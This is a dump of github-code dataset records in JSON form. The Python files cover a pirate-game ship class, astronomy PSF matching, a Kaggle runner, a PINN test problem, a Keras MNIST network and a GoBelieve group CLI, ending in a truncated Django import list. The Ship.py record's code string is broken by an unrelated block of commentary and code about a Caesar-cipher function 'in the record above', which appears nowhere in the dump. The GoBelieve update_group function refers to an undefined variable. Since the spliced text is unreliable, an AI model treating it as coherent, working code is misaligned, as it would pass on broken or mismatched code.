json_data['y']\n\n # should this be here?\n self.position = 
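Note that decrypt_cesar in the record above shifts forward (+shift), so it is really the Caesar encryption map; brute-forcing all 26 shifts still enumerates every rotation, which is why the loop in main works. It also passes lowercase letters through untouched. A case-preserving sketch:

import string

def rotate(text, shift):
    # Rotate letters by `shift`, preserving case and non-letters.
    out = []
    for ch in text:
        if ch in string.ascii_uppercase:
            out.append(string.ascii_uppercase[(string.ascii_uppercase.index(ch) + shift) % 26])
        elif ch in string.ascii_lowercase:
            out.append(string.ascii_lowercase[(string.ascii_lowercase.index(ch) + shift) % 26])
        else:
            out.append(ch)
    return "".join(out)

# Decrypting a shift of s is rotating by 26 - s:
assert rotate(rotate("HELLO", 3), 26 - 3) == "HELLO"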
json_data['position']\n\n def update(self, is_new=False):\n if is_new:\n ships.append(self.to_dict())\n else:\n ships[self.position] = self.to_dict()\n Ship.write_json_file()\n\n @staticmethod\n def write_json_file():\n with open(\"ship_file.json\", \"w\") as write_file:\n json.dump(ships, write_file)\n\n @staticmethod\n def find_ship(captain):\n \"\"\"returns the ship based on captain from ships variable\"\"\"\n index = 0\n for s in ships:\n if s['captain'] == captain:\n s['position'] = index\n temp_ship = Ship(captain)\n temp_ship.from_dict(s)\n return temp_ship\n index += 1\n return None\n\n @staticmethod\n def calc_upgrade(part, amount=1):\n return sum([int(100 + float(((part + temp_amount) ** 1.2) * 20)) for temp_amount in range(amount, 0, -1)])\n\n\"\"\"reading the ship file to add all the users ships to the dataspace\"\"\"\nwith open(\"ship_file.json\", \"r\") as read_file:\n first = read_file.read(1)\n global ships\n ships = []\n if first:\n read_file.seek(0)\n json_data = json.load(read_file)\n for s in json_data:\n ships.append(s)\n", "repo_name": "bdavs/Piratebot", "sub_path": "Ship.py", "file_name": "Ship.py", "file_ext": "py", "file_size_in_byte": 4440, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "json.dump", "line_number": 117, "usage_type": "call"}, {"api_name": "json.load", "line_number": 143, "usage_type": "call"}]} +{"seq_id": "18817265207", "text": "import photutils\nfrom photutils import create_matching_kernel\nfrom astropy.io import fits\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport scipy\nfrom photutils import TopHatWindow\nfrom photutils import CosineBellWindow\n\nwindow = CosineBellWindow(alpha=0.35)\nfrom scipy.signal import convolve as scipy_convolve\nwindow = TopHatWindow(0.35)\n\ndir1 = '/home/sourabh/ULIRG_package/data/OPTICAL_PSF/'\ndata_ref = fits.getdata(dir1 + 'f165psf.fits')\ndata_psf = fits.getdata(dir1 + 'PSF_775_gal4_rotate_cut.fits')\nkernel = create_matching_kernel(data_psf, data_ref) # , window = window )\nfits.writeto('ker.fits', data=kernel, overwrite=True)\nplt.imshow(kernel, cmap='Greys_r', origin='lower')\nfilename = '/home/sourabh/ULIRG_package/data/IRASF10594+3818/gal1_HA.fits'\nfileout = '/home/sourabh/ULIRG_package/data/IRASF10594+3818/gal1_HA_psfmatch.fits'\nker = 'ker.fits'\n#ker_shift = np.pad(kernel, ((0, 1), (0, 1)), mode='constant')\ndata1 = scipy_convolve(data_psf, kernel, mode='same')\nfits.writeto('test2.fits', data=data1, overwrite=True)\ndata3 = data1 - data_ref\nfits.writeto('test3.fits', data=data3, overwrite=True)\n\n\ndef psf_match(filename, fileout, ker):\n hdulist = fits.open(filename)\n data = hdulist[0].data\n\n hdu_ker = fits.open(ker)\n ker_data = hdu_ker[0].data\n ker_shift = np.pad(ker_data, ((0, 1), (0, 1)), mode='constant')\n\n data_out = scipy_convolve(data, ker_shift, mode='same', method='fft') # convolve\n\n hdulist[0].data = data_out\n fits.writeto('test.fits', data=data_out - data, overwrite=True)\n hdulist.writeto(fileout, overwrite=True, output_verify=\"ignore\")\n\n\npsf_match(filename, fileout, ker)\n\n\nplt.colorbar()\nplt.show()\n\n\n# In[36]:\n\n\nfrom matplotlib import pylab\n\nparams = {'legend.fontsize': 10,\n 'figure.figsize': (15, 7),\n 'axes.labelsize': 'x-large',\n 'axes.titlesize': 'x-large',\n 'xtick.labelsize': 'xx-large',\n 'ytick.labelsize': 'xx-large'}\nimport pylab as plot\nplot.rcParams.update(params)\npylab.rcParams.update(params)\n\n\ndef masks_circular(cent_x, cent_y, width, 
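The Ship class in the record above has an asymmetric round-trip: to_dict never writes a position key, yet from_dict reads json_data['position'] (the inline "should this be here?" comment flags exactly this), so deserializing a freshly serialized ship raises KeyError. A tolerant sketch of the deserializer:

def from_dict(self, json_data=None):
    """Populate the ship from a dict, tolerating a missing position."""
    if json_data is None:
        return None
    for field in ("captain", "ship_name", "cannons", "crew", "armor",
                  "sails", "gold", "win", "loss", "x", "y"):
        setattr(self, field, json_data[field])
    # to_dict does not emit 'position', so fall back to a default here
    self.position = json_data.get("position", 0)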
aper_lim, nx, ny):\n \"\"\"Function for creating circular aperture given center of circle.\n\n Args:\n cent_x:(float) x center pixel\n cent_y:(float) y center pixel\n width: (float) width of each aperture\n aper_lim:(float) maximum radius of aperture\n nx:(int) x width of total ULIRG image\n ny:(int) y width of total ULIRG image\n\n Returns:\n dict: masks- circular masks\\n\n masks_annulus - masks for annuli\\n\n\n \"\"\"\n rad1 = np.arange(1., aper_lim, width)\n y, x = np.mgrid[0:ny, 0:nx]\n masks_annulus = [np.where(((x - cent_x)**2 + (y - cent_y)**2 >= rad1[k]**2)\n & ((x - cent_x)**2 + (y - cent_y)**2 <= rad1[k + 1]**2)) for k in range(len(rad1) - 1)]\n\n masks = [np.where((x - cent_x)**2 + (y - cent_y)**2 < rad1[k]**2) for k in range(len(rad1))]\n rad_annulus = ([(a + b) / 2 for a, b in zip(rad1, rad1[1:])])\n\n return rad1, rad_annulus, masks, masks_annulus\n\n\ncent_x = 65\ncent_y = 65\nwidth = 3\naper_lim = 120\nnx = 130\nny = 130\nrad1, rad_annulus, masks, masks_annulus = masks_circular(cent_x, cent_y, width, aper_lim, nx, ny)\n\n\naper_ref = [(np.mean(data_ref[masks_annulus[k]])) for k in range(len(rad1) - 1)]\naper_psf = [(np.mean(data_psf[masks_annulus[k]])) for k in range(len(rad1) - 1)]\n#plt.plot(rad_annulus, aper_ref/aper_ref[0], label ='f165')\n#plt.plot(rad_annulus, aper_psf/aper_psf[0], label = 'f775')\naper_ref_sum = [(np.sum(data_ref[masks[k]])) for k in range(len(rad1))]\naper_psf_sum = [(np.sum(data_psf[masks[k]])) for k in range(len(rad1))]\n\n\nplt.plot(rad1, aper_ref_sum, label='f165')\nplt.plot(rad1, aper_psf_sum, label='f775')\n\n#plt.plot(rad_annulus, aper_ref/aper_ref[0], label ='f165')\n#plt.plot(rad_annulus, aper_psf/aper_psf[0], label = 'f775')\n\nplt.legend()\nplt.show()\n", "repo_name": "sourabhsc/NULIRG", "sub_path": "analysis/phot.py", "file_name": "phot.py", "file_ext": "py", "file_size_in_byte": 3864, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "photutils.CosineBellWindow", "line_number": 10, "usage_type": "call"}, {"api_name": "photutils.TopHatWindow", "line_number": 12, "usage_type": "call"}, {"api_name": "astropy.io.fits.getdata", "line_number": 15, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 15, "usage_type": "name"}, {"api_name": "astropy.io.fits.getdata", "line_number": 16, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 16, "usage_type": "name"}, {"api_name": "photutils.create_matching_kernel", "line_number": 17, "usage_type": "call"}, {"api_name": "astropy.io.fits.writeto", "line_number": 18, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 18, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "scipy.signal.convolve", "line_number": 24, "usage_type": "call"}, {"api_name": "astropy.io.fits.writeto", "line_number": 25, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 25, "usage_type": "name"}, {"api_name": "astropy.io.fits.writeto", "line_number": 27, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 27, "usage_type": "name"}, {"api_name": "astropy.io.fits.open", "line_number": 31, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 31, "usage_type": "name"}, {"api_name": "astropy.io.fits.open", "line_number": 34, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 34, 
"usage_type": "name"}, {"api_name": "numpy.pad", "line_number": 36, "usage_type": "call"}, {"api_name": "scipy.signal.convolve", "line_number": 38, "usage_type": "call"}, {"api_name": "astropy.io.fits.writeto", "line_number": 41, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "pylab.rcParams.update", "line_number": 64, "usage_type": "call"}, {"api_name": "pylab.rcParams", "line_number": 64, "usage_type": "attribute"}, {"api_name": "matplotlib.pylab.rcParams.update", "line_number": 65, "usage_type": "call"}, {"api_name": "matplotlib.pylab.rcParams", "line_number": 65, "usage_type": "attribute"}, {"api_name": "matplotlib.pylab", "line_number": 65, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.mgrid", "line_number": 85, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 108, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}]} +{"seq_id": "9888557967", "text": "import os\nimport sys\nimport time\nimport json\nimport argparse\n\nimport kaggle\n\n\ndef get_fetchparser():\n argparser = argparse.ArgumentParser()\n\n argparser.add_argument(\n 'kernel',\n help=\"Path to the notebook for which to fetch output from kaggle\"\n )\n return argparser\n\n\ndef get_runparser():\n argparser = argparse.ArgumentParser()\n\n argparser.add_argument(\n '--wait',\n action='store_true',\n help=\"Wait for notebook to finish executing\"\n )\n argparser.add_argument(\n '--fetch',\n action='store_true',\n help=\"Fetch notebook output\"\n )\n argparser.add_argument(\n 'kernel',\n help=\"Path to the notebook to execute on kaggle\"\n )\n return argparser\n\n\ndef get_metadata(kernel_dir):\n with open(os.path.join(kernel_dir, 'kernel-metadata.json')) as f:\n return json.load(f)\n\n\ndef wait_for(kernel_name):\n # wait for the kernel to finish running\n while True:\n time.sleep(1)\n print('.', end='', flush=True)\n status = kaggle.api.kernels_status(kernel_name)\n if status['status'] == 'complete':\n print(\"Kernel finished running\")\n break\n\n\ndef run():\n argv = sys.argv[1:]\n args = get_runparser().parse_args(argv)\n\n kernel_dir = os.path.dirname(args.kernel)\n\n print('submiting...')\n\n 
kaggle.api.kernels_push_cli(kernel_dir)\n\n metadata = get_metadata(kernel_dir)\n\n if args.wait or args.fetch:\n wait_for(metadata['id'])\n\n if args.fetch:\n kaggle.api.kernels_output(metadata['id'],\n os.path.join(kernel_dir, 'outputs'))\n\n\ndef fetch():\n argv = sys.argv[1:]\n args = get_fetchparser().parse_args(argv)\n\n kernel_dir = os.path.dirname(args.kernel)\n metadata = get_metadata(kernel_dir)\n\n wait_for(metadata['id'])\n kaggle.api.kernels_output(metadata['id'],\n os.path.join(kernel_dir, 'outputs'))\n", "repo_name": "chestrays/chestrays", "sub_path": "chestrays/__main__.py", "file_name": "__main__.py", "file_ext": "py", "file_size_in_byte": 1945, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "86", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 11, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 42, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 48, "usage_type": "call"}, {"api_name": "kaggle.api.kernels_status", "line_number": 50, "usage_type": "call"}, {"api_name": "kaggle.api", "line_number": 50, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 57, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path", "line_number": 60, "usage_type": "attribute"}, {"api_name": "kaggle.api.kernels_push_cli", "line_number": 64, "usage_type": "call"}, {"api_name": "kaggle.api", "line_number": 64, "usage_type": "attribute"}, {"api_name": "kaggle.api.kernels_output", "line_number": 72, "usage_type": "call"}, {"api_name": "kaggle.api", "line_number": 72, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 77, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path", "line_number": 80, "usage_type": "attribute"}, {"api_name": "kaggle.api.kernels_output", "line_number": 84, "usage_type": "call"}, {"api_name": "kaggle.api", "line_number": 84, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path", "line_number": 85, "usage_type": "attribute"}]} +{"seq_id": "27432342535", "text": "import torch\nimport numpy as np\nfrom torch.autograd import grad\n\nregion = [(-1,1),(0,1)]\n\ndef d(x,t):\n '''\n 到边界的距离函数\n '''\n return (x.pow(2)-1)*t\n\ndef g(x,t):\n '''\n 边界条件\n '''\n return -torch.sin(np.pi*x)\n\n\nu_real= 0\n\nBurgers_data = {'d':d,'g':g,'u_real':u_real,'region':region}", "repo_name": "xinyuxiao113/PINN-pytorch", "sub_path": "code/burgers/testProblem.py", "file_name": "testProblem.py", "file_ext": "py", "file_size_in_byte": 323, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "torch.sin", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 17, "usage_type": "attribute"}]} +{"seq_id": "42658377431", "text": "from DLplatform.learning.factories.kerasLearnerFactory import KerasNetwork\nimport numpy as np\n\nclass MNISTCNNNetwork(KerasNetwork):\n def __init__(self):\n pass\n \n def 
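wait_for in the kaggle record above polls kernels_status once a second and only exits on 'complete', so a kernel that errors out leaves the caller spinning forever. A sketch with a failure path and a timeout; the non-complete status names are assumptions about the kaggle API, not taken from the record:

import time
import kaggle

def wait_for(kernel_name, timeout=3600, poll_interval=5):
    deadline = time.time() + timeout
    while time.time() < deadline:
        status = kaggle.api.kernels_status(kernel_name)["status"]
        if status == "complete":
            print("Kernel finished running")
            return True
        if status in ("error", "cancelAcknowledged"):  # assumed failure states
            print("Kernel failed with status:", status)
            return False
        time.sleep(poll_interval)
    raise TimeoutError(f"{kernel_name} did not finish within {timeout}s")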
__call__(self):\n import tensorflow as tf\n from keras.models import Model\n from keras.layers import Input, Dense, Dropout, Conv2D, MaxPooling2D, Flatten\n from keras.initializers import glorot_uniform\n \n numClasses = 10\n imgRows = 28\n imgCols = 28\n inputShape = (imgRows, imgCols, 1)\n np.random.seed(42)\n tf.set_random_seed(42)\n static_initializer = glorot_uniform(seed=42)\n\n inp = Input(shape=inputShape)\n conv1 = Conv2D(32, kernel_size=(3, 3), activation='relu', \n kernel_initializer=static_initializer)(inp)\n conv2 = Conv2D(64, (3, 3), activation='relu', kernel_initializer=static_initializer)(conv1)\n pool = MaxPooling2D(pool_size=(2, 2))(conv2)\n dp1 = Dropout(0.25, seed=42)(pool)\n fl = Flatten()(dp1)\n ds = Dense(128, activation='relu', kernel_initializer=static_initializer)(fl)\n dp2 = Dropout(0.5, seed=42)(ds)\n outp = Dense(numClasses, activation='softmax', kernel_initializer=static_initializer)(dp2)\n network = Model(inputs=inp, outputs=outp)\n return network\n \n def __str__(self):\n return \"MNIST simple CNN\"\n", "repo_name": "fraunhofer-iais/dlapplication", "sub_path": "dlutils/models/keras/MNISTNetwork.py", "file_name": "MNISTNetwork.py", "file_ext": "py", "file_size_in_byte": 1390, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "86", "api": [{"api_name": "DLplatform.learning.factories.kerasLearnerFactory.KerasNetwork", "line_number": 4, "usage_type": "name"}, {"api_name": "numpy.random.seed", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 18, "usage_type": "attribute"}, {"api_name": "tensorflow.set_random_seed", "line_number": 19, "usage_type": "call"}, {"api_name": "keras.initializers.glorot_uniform", "line_number": 20, "usage_type": "call"}, {"api_name": "keras.layers.Input", "line_number": 22, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 23, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 25, "usage_type": "call"}, {"api_name": "keras.layers.MaxPooling2D", "line_number": 26, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 27, "usage_type": "call"}, {"api_name": "keras.layers.Flatten", "line_number": 28, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 29, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 30, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 31, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "43110832693", "text": "# -*- coding: utf-8 -*-\nimport config\nimport requests\nimport logging\nimport json\nimport time\nimport sys\nimport pymysql\nimport redis\nimport pprint\nfrom group import Group\nfrom user import User\nfrom rpc import send_group_notification\nfrom mysql import Mysql\nimport config\n\npublish_message = Group.publish_message\n\n\nrds = redis.StrictRedis(host=config.REDIS_HOST, password=config.REDIS_PASSWORD,\n port=config.REDIS_PORT, db=config.REDIS_DB, decode_responses=True)\n\n\ndb = Mysql(config.MYSQL_HOST, config.MYSQL_USER, config.MYSQL_PASSWD,\n config.MYSQL_DATABASE, config.MYSQL_PORT,\n config.MYSQL_CHARSET, config.MYSQL_AUTOCOMMIT)\n\nAPPID = config.APPID\n\ndef create_group(master, name, is_super, members):\n appid = APPID\n gid = Group.create_group(db, appid, master, name, \n is_super, members)\n \n s = 1 if is_super else 0\n content = {\n \"group_id\":gid,\n \"app_id\":appid,\n \"super\":s,\n 
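# Group.GROUP_EVENT_* constants identify the event type in the message published to redis.\n        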
\"name\":Group.GROUP_EVENT_CREATE\n } \n publish_message(rds, content)\n \n for mem in members:\n content = {\n \"group_id\":gid,\n \"member_id\":mem,\n \"name\":Group.GROUP_EVENT_MEMBER_ADD\n } \n publish_message(rds, content)\n \n v = {\n \"group_id\":gid, \n \"master\":master, \n \"name\":name, \n \"members\":members,\n \"timestamp\":int(time.time())\n }\n op = {\"create\":v}\n send_group_notification(appid, gid, op, members)\n \n return gid\n\n\n\ndef delete_group(gid):\n appid = APPID\n Group.disband_group(db, gid)\n\n v = {\n \"group_id\":gid,\n \"timestamp\":int(time.time())\n }\n op = {\"disband\":v}\n send_group_notification(appid, gid, op, None)\n\n content = {\"group_id\":gid, \"name\":Group.GROUP_EVENT_DISBAND} \n publish_message(rds, content)\n\n\n\ndef upgrade_group(gid):\n \"\"\"从普通群升级为超级群\"\"\"\n appid = APPID\n group = Group.get_group(db, gid)\n\n members = Group.get_group_members(db, gid)\n\n if not group:\n raise ResponseMeta(400, \"group non exists\")\n\n Group.update_group_super(db, gid, 1)\n\n\n content = {\n \"group_id\":gid,\n \"app_id\":appid,\n \"super\":1,\n \"name\":Group.GROUP_EVENT_UPGRADE\n } \n publish_message(rds, content)\n\n v = {\n \"group_id\":gid,\n \"timestamp\":int(time.time()),\n \"super\":1\n }\n op = {\"upgrade\":v}\n send_group_notification(appid, gid, op, None)\n\n\ndef update_group(gid):\n \"\"\"更新群组名称\"\"\"\n appid = request.appid\n obj = json.loads(request.data)\n name = obj[\"name\"]\n Group.update_group_name(db, gid, name)\n\n v = {\n \"group_id\":gid,\n \"timestamp\":int(time.time()),\n \"name\":name\n }\n op = {\"update_name\":v}\n send_group_notification(appid, gid, op, None)\n \ndef add_group_member(gid, members):\n appid = APPID\n if len(members) == 0:\n return\n\n db.begin()\n for member_id in members:\n try:\n Group.add_group_member(db, gid, member_id)\n except pymysql.err.IntegrityError as e:\n if e.args[0] != 1062: \n raise \n\n db.commit()\n\n for member_id in members:\n v = {\n \"group_id\":gid,\n \"member_id\":member_id,\n \"timestamp\":int(time.time())\n }\n op = {\"add_member\":v}\n send_group_notification(appid, gid, op, [member_id])\n\n content = {\n \"group_id\":gid,\n \"member_id\":member_id,\n \"name\":Group.GROUP_EVENT_MEMBER_ADD\n } \n publish_message(rds, content)\n\n\n\ndef remove_group_member(gid, memberid):\n appid = APPID\n Group.delete_group_member(db, gid, memberid)\n \n v = {\n \"group_id\":gid,\n \"member_id\":memberid,\n \"timestamp\":int(time.time())\n }\n op = {\"quit_group\":v}\n send_group_notification(appid, gid, op, [memberid])\n\n content = {\n \"group_id\":gid,\n \"member_id\":memberid,\n \"name\":Group.GROUP_EVENT_MEMBER_REMOVE\n } \n publish_message(rds, content)\n \n\n\ndef get_groups(uid):\n \"\"\"获取个人的群组列表\"\"\"\n appid = APPID\n groups = Group.get_groups(db, appid, uid)\n return groups\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 2:\n sys.exit(1)\n cmd = sys.argv[1]\n if cmd == \"create\":\n master = int(sys.argv[2])\n name = sys.argv[3]\n is_super = int(sys.argv[4])\n members = []\n for m in sys.argv[5:]:\n members.append(int(m))\n\n gid = create_group(master, name, is_super, members)\n print(\"new group id:\", gid)\n \n elif cmd == \"delete\":\n gid = int(sys.argv[2])\n delete_group(gid)\n \n elif cmd == \"upgrade\":\n gid = int(sys.argv[2])\n upgrade_group(gid)\n \n elif cmd == \"add_member\":\n gid = int(sys.argv[2])\n members = [] \n for m in sys.argv[3:]:\n members.append(int(m))\n\n add_group_member(gid, members)\n\n elif cmd == \"remove_member\":\n gid = int(sys.argv[2])\n for m 
in sys.argv[3:]:\n remove_group_member(gid, int(m))\n \n elif cmd == \"get\":\n uid = int(sys.argv[2])\n groups = get_groups(uid) \n pp = pprint.PrettyPrinter()\n pp.pprint(groups)\n\n elif cmd == \"test\":\n master = 1\n name = \"test\"\n is_super = 0\n members = [1, 2, 3, 4]\n gid = create_group(master, name, is_super, members)\n print(\"new group id:\", gid)\n \n\n add_group_member(gid, [5, 6])\n remove_group_member(gid, 6)\n \n upgrade_group(gid)\n\n groups = get_groups(master)\n \n pp = pprint.PrettyPrinter()\n pp.pprint(groups)\n\n delete_group(gid)\n", "repo_name": "GoBelieveIO/gobelieve_vagrant", "sub_path": "cli/gobelieve_group.py", "file_name": "gobelieve_group.py", "file_ext": "py", "file_size_in_byte": 5825, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "86", "api": [{"api_name": "group.Group.publish_message", "line_number": 17, "usage_type": "attribute"}, {"api_name": "group.Group", "line_number": 17, "usage_type": "name"}, {"api_name": "redis.StrictRedis", "line_number": 20, "usage_type": "call"}, {"api_name": "config.REDIS_HOST", "line_number": 20, "usage_type": "attribute"}, {"api_name": "config.REDIS_PASSWORD", "line_number": 20, "usage_type": "attribute"}, {"api_name": "config.REDIS_PORT", "line_number": 21, "usage_type": "attribute"}, {"api_name": "config.REDIS_DB", "line_number": 21, "usage_type": "attribute"}, {"api_name": "mysql.Mysql", "line_number": 24, "usage_type": "call"}, {"api_name": "config.MYSQL_HOST", "line_number": 24, "usage_type": "attribute"}, {"api_name": "config.MYSQL_USER", "line_number": 24, "usage_type": "attribute"}, {"api_name": "config.MYSQL_PASSWD", "line_number": 24, "usage_type": "attribute"}, {"api_name": "config.MYSQL_DATABASE", "line_number": 25, "usage_type": "attribute"}, {"api_name": "config.MYSQL_PORT", "line_number": 25, "usage_type": "attribute"}, {"api_name": "config.MYSQL_CHARSET", "line_number": 26, "usage_type": "attribute"}, {"api_name": "config.MYSQL_AUTOCOMMIT", "line_number": 26, "usage_type": "attribute"}, {"api_name": "config.APPID", "line_number": 28, "usage_type": "attribute"}, {"api_name": "group.Group.create_group", "line_number": 32, "usage_type": "call"}, {"api_name": "group.Group", "line_number": 32, "usage_type": "name"}, {"api_name": "group.Group.GROUP_EVENT_CREATE", "line_number": 40, "usage_type": "attribute"}, {"api_name": "group.Group", "line_number": 40, "usage_type": "name"}, {"api_name": "group.Group.GROUP_EVENT_MEMBER_ADD", "line_number": 48, "usage_type": "attribute"}, {"api_name": "group.Group", "line_number": 48, "usage_type": "name"}, {"api_name": "time.time", "line_number": 57, "usage_type": "call"}, {"api_name": "rpc.send_group_notification", "line_number": 60, "usage_type": "call"}, {"api_name": "group.Group.disband_group", "line_number": 68, "usage_type": "call"}, {"api_name": "group.Group", "line_number": 68, "usage_type": "name"}, {"api_name": "time.time", "line_number": 72, "usage_type": "call"}, {"api_name": "rpc.send_group_notification", "line_number": 75, "usage_type": "call"}, {"api_name": "group.Group.GROUP_EVENT_DISBAND", "line_number": 77, "usage_type": "attribute"}, {"api_name": "group.Group", "line_number": 77, "usage_type": "name"}, {"api_name": "group.Group.get_group", "line_number": 85, "usage_type": "call"}, {"api_name": "group.Group", "line_number": 85, "usage_type": "name"}, {"api_name": "group.Group.get_group_members", "line_number": 87, "usage_type": "call"}, {"api_name": "group.Group", "line_number": 87, "usage_type": 
"name"}, {"api_name": "group.Group.update_group_super", "line_number": 92, "usage_type": "call"}, {"api_name": "group.Group", "line_number": 92, "usage_type": "name"}, {"api_name": "group.Group.GROUP_EVENT_UPGRADE", "line_number": 99, "usage_type": "attribute"}, {"api_name": "group.Group", "line_number": 99, "usage_type": "name"}, {"api_name": "time.time", "line_number": 105, "usage_type": "call"}, {"api_name": "rpc.send_group_notification", "line_number": 109, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 115, "usage_type": "call"}, {"api_name": "group.Group.update_group_name", "line_number": 117, "usage_type": "call"}, {"api_name": "group.Group", "line_number": 117, "usage_type": "name"}, {"api_name": "time.time", "line_number": 121, "usage_type": "call"}, {"api_name": "rpc.send_group_notification", "line_number": 125, "usage_type": "call"}, {"api_name": "group.Group.add_group_member", "line_number": 135, "usage_type": "call"}, {"api_name": "group.Group", "line_number": 135, "usage_type": "name"}, {"api_name": "pymysql.err", "line_number": 136, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 146, "usage_type": "call"}, {"api_name": "rpc.send_group_notification", "line_number": 149, "usage_type": "call"}, {"api_name": "group.Group.GROUP_EVENT_MEMBER_ADD", "line_number": 154, "usage_type": "attribute"}, {"api_name": "group.Group", "line_number": 154, "usage_type": "name"}, {"api_name": "group.Group.delete_group_member", "line_number": 162, "usage_type": "call"}, {"api_name": "group.Group", "line_number": 162, "usage_type": "name"}, {"api_name": "time.time", "line_number": 167, "usage_type": "call"}, {"api_name": "rpc.send_group_notification", "line_number": 170, "usage_type": "call"}, {"api_name": "group.Group.GROUP_EVENT_MEMBER_REMOVE", "line_number": 175, "usage_type": "attribute"}, {"api_name": "group.Group", "line_number": 175, "usage_type": "name"}, {"api_name": "group.Group.get_groups", "line_number": 184, "usage_type": "call"}, {"api_name": "group.Group", "line_number": 184, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 188, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 189, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 190, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 192, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 193, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 194, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 196, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 203, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 207, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 211, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 213, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 219, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 220, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 224, "usage_type": "attribute"}, {"api_name": "pprint.PrettyPrinter", "line_number": 226, "usage_type": "call"}, {"api_name": "pprint.PrettyPrinter", "line_number": 245, "usage_type": "call"}]} +{"seq_id": "71390490843", "text": "from datetime import date\nfrom rest_framework.authentication import SessionAuthentication, BasicAuthentication\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.permissions import IsAdminUser\nfrom rest_framework.decorators import 
